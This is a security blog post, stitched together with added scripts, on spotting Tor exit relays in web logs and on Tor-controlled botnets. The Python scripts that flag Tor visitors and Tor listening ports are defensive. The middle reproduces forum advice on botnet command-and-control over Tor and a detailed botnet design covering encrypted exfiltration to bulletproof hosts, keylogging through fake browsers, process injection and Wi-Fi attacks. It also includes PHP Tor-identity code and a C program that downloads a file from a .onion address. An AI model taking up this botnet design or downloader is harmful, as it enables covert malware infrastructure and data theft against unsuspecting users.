A fingerprint of NO COUNTRY FLAGS on my logs shows a Tor exit-relay type anonymized network according to the visitor statistics: Figure 1 (below) is a snapshot of my log from ExtremeTracking.com –// You notice the IPs or names of referring sites with no country flags. Example: for-exit0-readme.dfi.se – tor21.anonymizer.ccc.de – and a few more —


I decided to –Trust but Verify– the security Dude’s secret motto – mEoW

I went to the command line:

curl tor21.anonymizer.ccc.de – it came back with information that this exit-relay comes from the Tor Project’s personal relays – and it’s a private relay, because I checked it against and, guess what, it’s hosted by their dear friends the Chaos Computer Club – that brings back the “way-back machine” to the old days of real hacking, but these are the guys from Germany and they are good friends of the Tor Project, so this is a trusted Tor exit relay for the Tor Project..// interesting // they were reading my “recon the deep web” article

curl tor21.anonymizer.ccc.de

<li><a href="https://www.torproject.org/overview.html">Tor Overview</a></li>

<li><a href="https://www.torproject.org/faq-abuse.html">Tor Abuse FAQ</a></li>

<li><a href="https://www.torproject.org/eff/tor-legal-faq.html">Tor Legal FAQ</a></li>


IP – – All Onion Router (OR) relays from Chaos seem to be – OS Windows 7

27 Jun, Wed, 14:02:33 tor21.anonymizer.ccc.de uscyberlabs.com/blog/2012/02/05/recon-deep-web/


I found out all 3 Tor OR-relays had this signature – No Flag Fingerprint = Tor/I2P = secure traffic / anonymized traffic –
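The “no country flag” pattern above is a side effect of the geo-location database having no entry for the exit’s address, so it is only a hint; a webmaster who wants a reliable signal should check each visitor against the Tor Project’s published exit list and against the reverse-DNS naming conventions exit operators use (tor21.anonymizer.ccc.de, tor-exit-router35-readme.formlessnetworking.net and for-exit0-readme.dfi.se from this post all follow them). The script below is an added example, not code from the original post: it parses combined-format access log lines and flags the visitors that match either check. The log lines, IP addresses and exit list in it are constructed samples; in real use the exit list comes from https://check.torproject.org/torbulkexitlist (one IPv4 per line) and the naming patterns are my own assumption, tuned to the hostnames quoted above.

```python
"""Flag web-server visitors that arrive from Tor exit relays.

Added example (not from the original post). Two checks are applied to the
host field of each access-log line: membership in a bulk exit list, and
reverse-DNS names that follow common exit-operator naming conventions.
All log lines, IP addresses and the exit list below are constructed samples.
"""
import re
from ipaddress import ip_address

# Constructed stand-in for the Tor Project's bulk exit list
# (https://check.torproject.org/torbulkexitlist gives one IPv4 per line).
SAMPLE_EXIT_LIST = """\
# constructed sample, not real exit addresses
192.0.2.10
198.51.100.7
203.0.113.44
"""

# Reverse-DNS naming conventions seen on exit relays (assumed patterns;
# they match the hostnames quoted in the post above).
EXIT_NAME_PATTERNS = [
    re.compile(r"(^|[.-])tor[0-9]*([.-]|$)", re.I),   # tor21.example, tor-exit...
    re.compile(r"tor-?exit", re.I),
    re.compile(r"exit[0-9]*-readme", re.I),            # for-exit0-readme...
    re.compile(r"anonymizer", re.I),
]

# Combined log format (Apache/nginx default):
# host ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+'
)


def load_exit_list(text):
    """Parse a bulk-exit-list body into a set of ip_address objects."""
    exits = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        exits.add(ip_address(line))
    return exits


def classify_host(host, exits):
    """Return 'exit-list', 'exit-name' or None for one log host field."""
    try:
        if ip_address(host) in exits:
            return "exit-list"
        return None                      # a plain IP that is not on the list
    except ValueError:
        pass                             # not an IP: the server logged a hostname
    for pat in EXIT_NAME_PATTERNS:
        if pat.search(host):
            return "exit-name"
    return None


def flag_tor_visits(log_text, exits):
    """Return [(host, reason, request)] for every log line that looks like an exit relay."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                     # not a combined-format line, skip it
        reason = classify_host(m["host"], exits)
        if reason:
            hits.append((m["host"], reason, m["req"]))
    return hits


# Constructed access-log lines: one exit by list, two by name, two ordinary
# visitors (one with a hostname that merely contains the letters "tor").
SAMPLE_LOG = """\
192.0.2.10 - - [27/Jun/2012:14:02:33 -0400] "GET /blog/2012/02/05/recon-deep-web/ HTTP/1.1" 200 5120
tor21.anonymizer.ccc.de - - [27/Jun/2012:14:02:35 -0400] "GET /blog/2012/02/05/recon-deep-web/ HTTP/1.1" 200 5120
198.51.100.200 - - [27/Jun/2012:14:03:01 -0400] "GET / HTTP/1.1" 200 2048
history.example.org - - [27/Jun/2012:14:03:10 -0400] "GET /about HTTP/1.1" 200 1024
tor-exit-router35-readme.formlessnetworking.net - - [27/Jun/2012:14:04:00 -0400] "GET /feed HTTP/1.1" 200 4096
"""

if __name__ == "__main__":
    exits = load_exit_list(SAMPLE_EXIT_LIST)
    for host, reason, req in flag_tor_visits(SAMPLE_LOG, exits):
        print(f"{reason:9s} {host:50s} {req}")
```

The exit-list check only works when the server logs raw IPs (no HostnameLookups), and the name check only works when it logs resolved names, so run both. Exit lists churn hourly, so a visitor that matched last week may not match today; keep the list you tested against alongside the log.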

*** –Trust but Verify –/ What caught my attention in the log was one owned by nLayer Communications — Who is nLayer? They provide Internet connectivity solutions. The company provides IP transit, data transportation, and managed networking services to government agencies: CIA, FBI, NSA, any alphabet-soup agency that you want from the .gov folks.

How did we get from there to nLayer: a traceroute command

[2] traceroute to (, 64 hops max, 52 byte packets

1 (  11.513 ms  10.851 ms  8.521 ms

2  wwcksysc01-gex0103000.ri.ri.cox.net (  10.120 ms  11.272 ms  7.912 ms

3  ip98-190-33-21.ri.ri.cox.net (  11.896 ms  9.496 ms  12.044 ms

4  provdsrj01-ae3.0.rd.ri.cox.net (  10.429 ms  13.194 ms  11.063 ms

5  nyrkbprj01-ae2.0.rd.ny.cox.net (  18.038 ms  15.177 ms  14.140 ms

6  ae0-50g.cr1.nyc3.us.nlayer.net (  16.279 ms  17.128 ms  17.859 ms

7  xe-7-3-0.cr1.lhr1.uk.nlayer.net (  87.076 ms  83.085 ms  82.096 ms

8  ae1-70g.ar1.lhr1.uk.nlayer.net (  83.856 ms  84.420 ms  85.732 ms

9  as13335.xe-4-0-6.ar1.lhr1.uk.nlayer.net (  82.774 ms  102.143 ms  82.082 ms

10 (  83.317 ms  83.772 ms  82.424 ms

And of course this all goes thru some dummy corporate stuff to fool anyone // if you dig a little // I guess Global Telecom & Technology, Inc. (“GTT”), (OTCBB: GTLT.OB – // – have you seen their stock almost double since the US government stepped up its cyber position? good cyber investment I guess –// ), a global network operator providing managed data services to large enterprise, government and carrier customers in over 80 countries worldwide, today announced the acquisition of privately-held, Chicago-based nLayer Communications, Inc. –government and carrier customers/ government and carrier customers / government and carrier customers…//


So gAtO, what does all this mean / simple website statistics can help you see your anonymized visitors — No Flag Fingerprint = Tor/I2P = secure traffic / anonymized traffic – / or it could be from a government site – knock, knock, knocking at your website door – or a business spying on your site, your information. gAtO thinks it’s a waste of time because gAtO is wasted most of the time when he writes this stuff – RI MMP program, life sucks big time.

Besides the Tor or I2P traffic // the pattern in the fingerprint that shows no country flag: — secure traffic / anonymized — this is open source software that governments have modified for their own skunk works… Governments have taken the 3rd-level Tor onion routing (code) and have their own similar network, but under the hood it is the same core code – the “no flag” shows the root code’s flaw. So any webmaster that has a website can find Tor-like exit relays or govs, watching you watching them –

: As long as the visitor is visiting from inside the matrix of an anonymized network they must use an exit node – no country flag – GOTCHA — gATO ouT

By the way, Chaos Computer Club – nice Tor exit node


gAtOmAlO lAb nOtEs –=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


traceroute to (, 64 hops max, 52 byte packets

1 (  46.027 ms  12.175 ms  9.976 ms

2  wwcksysc01-gex0103000.ri.ri.cox.net (  15.444 ms  11.472 ms  10.996 ms

3  ip98-190-33-21.ri.ri.cox.net (  10.043 ms  9.272 ms  10.127 ms

4  provdsrj01-ae3.0.rd.ri.cox.net (  9.597 ms  9.633 ms  16.782 ms

5 (  21.272 ms  22.538 ms  21.357 ms

6  ae-6.r21.asbnva02.us.bb.gin.ntt.net (  42.541 ms  50.629 ms  61.680 ms

7  ae-2.r23.amstnl02.nl.bb.gin.ntt.net (  133.403 ms  162.975 ms  137.493 ms

8  ae-2.r02.amstnl02.nl.bb.gin.ntt.net (  136.255 ms  128.778 ms  133.927 ms

9  xe-4-1.r02.dsdfge01.de.bb.gin.ntt.net (  142.335 ms  142.499 ms  141.396 ms

10  xe-3-4.r00.dsdfge02.de.bb.gin.ntt.net (  133.058 ms  128.793 ms *

11 (  132.148 ms  136.187 ms  132.329 ms

12  tor21.anonymizer.ccc.de (  123.563 ms  130.866 ms  121.906 ms —



traceroute to (, 64 hops max, 52 byte packets

1 (  1842.973 ms  9.712 ms  10.324 ms

2  wwcksysc01-gex0103000.ri.ri.cox.net (  9.961 ms  10.751 ms  10.437 ms

3  ip98-190-33-21.ri.ri.cox.net (  12.393 ms  10.226 ms  9.773 ms

4  provdsrj01-ae3.0.rd.ri.cox.net (  19.731 ms  9.270 ms  18.419 ms

5  nyrkbprj01-ae2.0.rd.ny.cox.net (  15.479 ms  15.045 ms  16.067 ms

6  ae0-50g.cr1.nyc3.us.nlayer.net (  15.114 ms  22.195 ms  16.909 ms

7  ae2-70g.cr1.ewr1.us.nlayer.net (  16.976 ms  28.552 ms  15.767 ms

8  xe-3-1-0.cr1.sjc1.us.nlayer.net (  90.901 ms  104.251 ms  90.386 ms

9  ae1-40g.ar2.sjc1.us.nlayer.net (  97.274 ms  91.747 ms  92.165 ms

10  as18779.xe-4-0-4.ar2.sjc1.us.nlayer.net (  91.277 ms  104.404 ms  100.544 ms

11  gw-ao.sjc01.appliedops.net (  98.566 ms  92.947 ms  91.660 ms

12  tor-exit-router35-readme.formlessnetworking.net (  93.154 ms  92.201 ms  92.769 ms



traceroute to (, 64 hops max, 52 byte packets

1 (  19.522 ms  35.384 ms  9.940 ms

2  wwcksysc01-gex0103000.ri.ri.cox.net (  12.016 ms  11.162 ms  9.829 ms

3  ip98-190-33-21.ri.ri.cox.net (  13.815 ms  8.970 ms  9.637 ms

4  provdsrj01-ae3.0.rd.ri.cox.net (  11.118 ms  11.123 ms  9.964 ms

5 (  20.776 ms  20.920 ms  61.446 ms

6  ttc.tenge11-1.br02.ldn01.pccwbtn.net (  95.216 ms  107.984 ms  94.783 ms

7 (  149.863 ms  149.865 ms  149.539 ms

8  vl554-gvrn-sr1.msk1.net.lancronix.ru (  158.159 ms  165.395 ms  157.553 ms (  157.467 ms  157.215 ms  166.376 ms



Are Criminals Using Tor-onion- Controlled Botnet

gAtO aSkEd – are criminals using the Tor .onion network to run botnets? I started searching in the deep dark web and found some interesting discussion threads. I copied them down from different places in onion land. But a simple search in “the abyss” search engine — http://nstmo7lvh4l32epo.onion — a dark web search engine, can let you see a few places where Tor-controlled botnets are being sold and discussed, and a place where you can ask questions and get back some real answers since they’re in the .onion.

So this may shed some light on what hackers and criminals are talking about, and show how the bad guys are doing it – I just want to learn. -gAtO oUt


  • Is there any good reason for a botnet not to contact an onionland server for C&C? It seems like that would make it harder to shut down, since you can’t find the server. What reason am I missing for this not being done more often?
  • This is actually very simple to implement. I’ve been working on a project that does this for a few months that’s pretty much complete.
  • My bot uses a hidden service to pull down a custom torrc, this file contains information on private directory servers which it then uses to connect to a private tor network.
  • The bot can choose whether to stay on the public tor network or connect to a private network depending on what the C&C tells it to do.
  • If it connects to the private network it does a check to see if the client machine is hosted behind a NAT, if it’s not it becomes a relay and exit node.
  • I’m a newbie coder and wrote this in C so it is very easy to do. I’m just in the process of porting the whole thing over to linux atm.
  • The most obvious way to do this would be to install Tor on compromised systems and have the bots set up to issue their commands through Tor.
  • Another way would be to just run the C&C server on Tor and have the bots use a tor to web proxy, either a public one or you could set up your own on compromised servers. The downside with this approach is that it would be a lot easier to block and shut down.
  • A third option is to run your own Tor network and have the clients with higher bandwidth and up-time act as relays. This would seem like the most difficult approach and would require you to run your own root server which would lessen the resilience of the botnet.
  • I prefer the idea of using the normal Tor network with bots acting as clients only. This option seems like it would be pretty easy to set up and would insulate you from a lot of the risks normally associated with running a botnet. I’m not sure if this would require much modification to the Tor code.
  • Assuming the network was only to comprise of Windows machines you could use the Tor Expert Package. If Tor could be installed from the command line and have it hide from the system as much as possible, such as not creating Start Menu entries and Desktop icons, then this could have some potential without really much work at all. Does anyone know if this is possible, can Tor be installed from the command line with flags that set the options that would need disabling and without popping up an install wizard? If this is possible then Tor wouldn’t even need modifying at all.
  • As far as I can see, assuming Tor is not compromised and you are careful about how you do it, this seems like the best way to run a resilient botnet. If the C&C server code is secure and you keep the attack surface to a minimum this sort of network would resist a lot of scrutiny before it could effectively be mitigated.

gAtOmAlO LaB nOtEs

Working on a similar project. Dark Umbrella fast flux/domain flux hybrid approach

(In development about 3-5 months left)

bot coded in assembly no dependencies

Each build has a maximum of 10k bots to avoid widespread av detection.

Basic bot uses socks5.

built in ssh client


Bot is built with 30k pre generated 256 bit AES keys.

1 256 bit AES key for logs

1 256 bit AES key ssh

1 256 bit AES key socks 5

hwid it selects a pre-generated key 256 bit AES key.

Bot writes encrypted data into a common file using steganography

process injection

Download/Upload Socks5

Bot sends data to a collector bot via socks5 through ipv6 which makes NAT traversal a trivial matter.

Using ipv6 in ipv4 tunnel.

Collector bot assembly

tor and i2p Plug-ins C++

Assuming 10k bots

Bots will be assigned into small groups of 25. And are assigned 400 collectors bots which is evenly 200 tor and 200 i2p.

Collector packages the encrypted logs and imports them into a .zip or rar archive and uses sftp to upload through tor to a bullet proof server. Note the Ukraine is best known.

Russia is no good.

(Domain-flux .onion panel can be easily moved)

Using a Ubuntu Server on bullet proof server.

Using tor and Privoxy. Panel can be routed through multiple cracked computers using proxychains and ssh.

Server uses a simple .onion panel with php5 and apache2 and mysql.

You might ask what happens if bullet proof server is down. The collector bots can be loaded with 5 .onion panels. If panel fails for 24 hours its removed from all Collectors and bot will go to the next one and so forth.

A python Daemon runs and unzips the data and Imports it into a mysql database where it remains encrypted.

The bot master uses my Dark Umbrella .net panel to connect to the remote Bullet Proof server through a vpn and then through tor using ssh to run remote commands on the server and sftp to upload and download. Running tor through a logless vpn with a trusted exit node on the tor network. The .net panel connects to the mysql database; the database is decrypted on the .NET panel (Note: most real Bullet Proof hosting is not trustworthy, this solves that issue) and imported into a local .mdb database. Then later the bot Master should encrypt the database folder on true crypt. Commands are sent to bots individually rather than corporately like most bot nets. This allows for greater anonymity. It will be possible to send commands corporately but strongly discouraged. Collector bots download and upload large files through i2p.

1.Connects remotely to rpc daemon through backconnect and simplifying metasploit (Working)

2.Social network cracker. (in development)

3.Statics. (Working)

4.Anonymity status. (Working)

5.Decrypt-er. Decryption codes in highly obfuscated.net limiting each build to 10k bots. (Working)

6.Daemon status (Working)

7.logs (Working)

8.Metasploit connects via rpc. (working)

9. GPS tracked Assets by Google maps and using net-book with a high powered external usb wifi antennas.

Starts an automatic attack if wep; if wpa2 grabs handshake. If open starts basic arp spoofing attack. Common browser exploits. (in development)

10.Teensy spread. (in development)

11.vnc back connect. (working)

12. Advanced Persistent threat. Fake Firefox, Fake Internet Explorer, Fake Chrome. Fake Windows Security Essentials. (in development, allows for excellent custom Bot-master defined keylogging)

13. Dark search bot index file is downloaded allowing easy searching of hard drives. (Working)

14. voip logic bomb. bot computer is sent via a voip call file once played through voip the microphone hears mp3 file and the dormant payload is activated in bot that is the logic bomb. (in development)

bot Plug-ins developed later

Each Panel is hwid

1 unique build per Copy embedded into panel.


// Ask a local Tor daemon for a fresh circuit over its control port.
// The default control address was blank on the page; pass it explicitly.
function tor_new_identity($tor_ip='', $control_port='9051', $auth_code=''){
    $fp = fsockopen($tor_ip, $control_port, $errno, $errstr, 30);
    if (!$fp) return false; //can't connect to the control port

    // $auth_code is the hex-encoded cookie from tor_get_cookie()
    fputs($fp, "AUTHENTICATE $auth_code\r\n");
    $response = fread($fp, 1024);
    list($code, $text) = explode(' ', $response, 2);
    if ($code != '250') { fclose($fp); return false; } //authentication failed

    //send the request for a new identity
    fputs($fp, "signal NEWNYM\r\n");
    $response = fread($fp, 1024);
    list($code, $text) = explode(' ', $response, 2);
    fclose($fp);
    if ($code != '250') return false; //signal failed

    return true;
}

/**
 * Load Tor's "magic cookie" from a file and encode it in hexadecimal.
 */
function tor_get_cookie($filename){
    $cookie = file_get_contents($filename);
    //convert the cookie to hexadecimal, two digits per byte
    $hex = '';
    for ($i=0;$i<strlen($cookie);$i++){
        $h = dechex(ord($cookie[$i]));
        $hex .= str_pad($h, 2, '0', STR_PAD_LEFT);
    }
    return strtoupper($hex);
}


#include <stdio.h>
#include <stdlib.h>
#include <curl/curl.h>   /* curl/types.h and curl/easy.h are no longer separate headers */

/* libcurl write callback: append the received bytes to the open output file */
size_t write_data(void *ptr, size_t size, size_t nmemb, FILE *stream) {
    size_t written;
    written = fwrite(ptr, size, nmemb, stream);
    return written;
}

void startTor() {
    /* no body was given on the page */
}

int main(void) {

//    startTor();

    CURL *curl;
    FILE *fp;
    CURLcode res;
    char *url = "http://46lm7zhgildryehk.onion/files/msg.sig";
    char outfilename[FILENAME_MAX] = "C:\\msg.sig";
    curl = curl_easy_init();
    if (curl) {
        fp = fopen(outfilename, "wb");
        if (!fp) {
            curl_easy_cleanup(curl);
            return 1;
        }
        /* the proxy address was blank on the page */
        curl_easy_setopt(curl, CURLOPT_PROXY, "");
        curl_easy_setopt(curl, CURLOPT_URL, url);
        curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_data);
        curl_easy_setopt(curl, CURLOPT_WRITEDATA, fp);
        res = curl_easy_perform(curl);
        if (res != CURLE_OK)
            fprintf(stderr, "curl_easy_perform() failed: %s\n", curl_easy_strerror(res));
        fclose(fp);
        curl_easy_cleanup(curl);
    }
    return 0;
}


Now first gAtO will give you the counter-measures: you see, if they run Tor then a simple “netstat -ar |grep LISTEN” at any unix terminal will show you what is open and who and what is LISTENing on what ports:../

Now when I am only using Tor to browse, I run —>  :MacOS gatomalo$ netstat -av |grep LISTEN

Tor Browser – tcp4       0      0  *.9030                 *.*                    LISTEN

After I run Tor manually to use system commands I can see my ticket out: :MacOS gatomalo$ netstat -av |grep LISTEN

Tor tcp4       0      0  localhost.9050    *.*    LISTEN

Tor Bundle tcp4       0      0  *.9030                 *.*    LISTEN

So turn off port 9050 in your firewall.
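The netstat check above works because a stock Tor listens on well-known ports: 9050 (SocksPort) and 9051 (ControlPort) for the daemon, 9150/9151 for the Tor Browser bundle, and 9030 (DirPort) / 9001 (ORPort) when the install is also a relay. The script below is an added example, not code from the original post: it parses netstat LISTEN lines in both the BSD/macOS form shown above (`*.9050`) and the Linux form (`0.0.0.0:9050`) and reports any listener on one of those ports, so the same check can run across a fleet of hosts. The sample netstat lines in it are constructed (the first two copy the post’s own output); the port table holds Tor’s documented defaults.

```python
"""Flag listening sockets on Tor's well-known ports from netstat output.

Added example, not from the original post. It parses the two netstat
formats a sysadmin meets most (BSD/macOS "*.9050" and Linux "0.0.0.0:9050")
and reports any LISTEN socket on a port Tor uses by default.
The sample netstat lines below are constructed.
"""
import re

# Tor's default listening ports (torrc option -> meaning).
TOR_DEFAULT_PORTS = {
    9050: "SocksPort (tor daemon)",
    9051: "ControlPort (tor daemon)",
    9150: "SocksPort (Tor Browser bundle)",
    9151: "ControlPort (Tor Browser bundle)",
    9030: "DirPort (relay directory mirror)",
    9001: "ORPort (relay)",
}

# A LISTEN line: proto, recv-q, send-q, local address, foreign address, state.
NETSTAT_RE = re.compile(
    r"^(?P<proto>tcp[46]?)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<remote>\S+)\s+(?P<state>LISTEN)\b"
)


def split_local(local):
    """Return (host, port) from '*.9050', 'localhost.9050', '0.0.0.0:9050' or ':::9050'.

    Linux joins host and port with ':'; BSD/macOS uses '.' even for IPv6
    ('::1.9050'), so decide by whether the text after the last ':' still
    contains a '.' (then it is a BSD-style address.port).
    """
    if ":" in local and "." not in local.split(":")[-1]:   # Linux style
        host, _, port = local.rpartition(":")
    else:                                                   # BSD/macOS style
        host, _, port = local.rpartition(".")
    return host or "*", int(port)


def find_tor_listeners(netstat_output):
    """Return [(port, host, description)] for LISTEN sockets on Tor default ports."""
    found = []
    for line in netstat_output.splitlines():
        m = NETSTAT_RE.match(line.strip())
        if not m:
            continue                      # header line or a non-LISTEN socket
        host, port = split_local(m["local"])
        if port in TOR_DEFAULT_PORTS:
            found.append((port, host, TOR_DEFAULT_PORTS[port]))
    return found


# Constructed sample: macOS lines (the first two mirror the post's output),
# then Linux-style lines, plus listeners that are not Tor (sshd, httpd).
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp4       0      0  localhost.9050         *.*                    LISTEN
tcp4       0      0  *.9030                 *.*                    LISTEN
tcp4       0      0  *.22                   *.*                    LISTEN
tcp        0      0 127.0.0.1:9051          0.0.0.0:*               LISTEN
tcp6       0      0 :::80                   :::*                    LISTEN
"""

if __name__ == "__main__":
    for port, host, what in find_tor_listeners(SAMPLE_NETSTAT):
        print(f"port {port} on {host}: {what}")
```

Port matching is only a first pass: a Tor configured with non-default SocksPort or ControlPort values slips through it, so follow up with a process-level check such as `lsof -i -P | grep -i tor` on the hosts that matter, and block the default ports at the firewall as the post suggests.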